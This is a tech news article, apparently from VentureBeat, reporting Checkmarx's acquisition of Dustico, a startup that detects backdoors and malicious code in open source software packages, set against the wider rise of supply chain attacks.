Skip to main content

Checkmarx’s Dustico acquisition bolsters the open source software supply chain

Software developer
Man and 2 laptop screen with program code.
Image Credit: VeniThePooh via Getty

Join us in Atlanta on April 10th and explore the landscape of security workforce. We will explore the vision, benefits, and use cases of AI for security teams. Request an invite here.


Let the OSS Enterprise newsletter guide your open source journey! Sign up here.

Application security testing (AST) company Checkmarx has acquired Dustico, a platform for detecting backdoors and other malicious activity in the open source software supply chain. Terms of the deal were not disclosed.

Combined with Checkmarx’s open source software composition analysis tool CxSCA, it will offer customers a “unified view into the risk, reputation, and behavior of open source packages” to help prevent supply chain attacks, the company said.

The software supply chain has emerged as a major area of focus for security-conscious companies, due in large part to the growing scourge of attacks that target businesses by exploiting vulnerabilities in “trusted” third-party software. The European Union’s (EU) cybersecurity agency ENISA recently published a report called Threat Landscape for Supply Chain Attacks, which predicted a fourfold increase in supply chain attacks in 2021 versus 2020, with notable events such as the SolarWinds breach impacting companies and government agencies around the globe.

VB Event

The AI Impact Tour – Atlanta

Continuing our tour, we’re headed to Atlanta for the AI Impact Tour stop on April 10th. This exclusive, invite-only event, in partnership with Microsoft, will feature discussions on how generative AI is transforming the security workforce. Space is limited, so request an invite today.
Request an invite

The rise in such attacks can be attributed somewhat to the growing use of open source components in software development, a process that often leans on automated dependency managers that may download and install dozens or hundreds of open source packages as part of the software lifecycle process — some of which may contain critical vulnerabilities or malicious code deliberately inserted by bad actors.

A quick peek across the cybersecurity landscape reveals a concerted push to address security in the software supply chain. Just last week, ReversingLabs secured $56 million in venture capital funding to combat software supply chain attacks. Elsewhere, GitLab recently open-sourced Package Hunter to detect malicious code in dependencies, while Google introduced Supply Chain Levels for Software Artifacts (SLSA), touted as an end-to-end framework for “ensuring the integrity of software artifacts throughout the software supply chain.”

Unified

Founded out of Israel in 2006, Checkmarx offers a range of software security products, such as integrated source code (open source and proprietary) scanning tools, and has amassed a roster of big-name customers, including Sony, SAP, Deloitte, Visa, and Coca-Cola. Accordingly, private equity giant Hellman & Friedman acquired Checkmarx in a $1.15 billion deal last year.

Dustico, which was founded less than a year ago, has built a machine learning-powered platform that conducts software package behavioral analysis and detection to avert would-be attackers in the open source software supply chain. Adopting a multi-pronged approach, Dustico checks the credibility of the software package provider and project contributors while verifying the health of the package itself based on metrics such as update frequency and how well it’s maintained. Dustico also checks for dubious backdoors and any other form of malicious activity. The company is perhaps less focused on spotting vulnerabilities inadvertently introduced by human error than it is eking out code that looks the part but has ill intentions.

“When code has been written to deliberately hide its intent, it’s important to evaluate what the code does when you run it and who created it in the first place,” Checkmarx software composition analysis and open source evangelist Robert Haynes wrote in a blog post. “Evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make are all critical indicators of the package’s intent.”

VB Daily - get the latest in your inbox

Thanks for subscribing. Check out more VB newsletters here.

An error occured.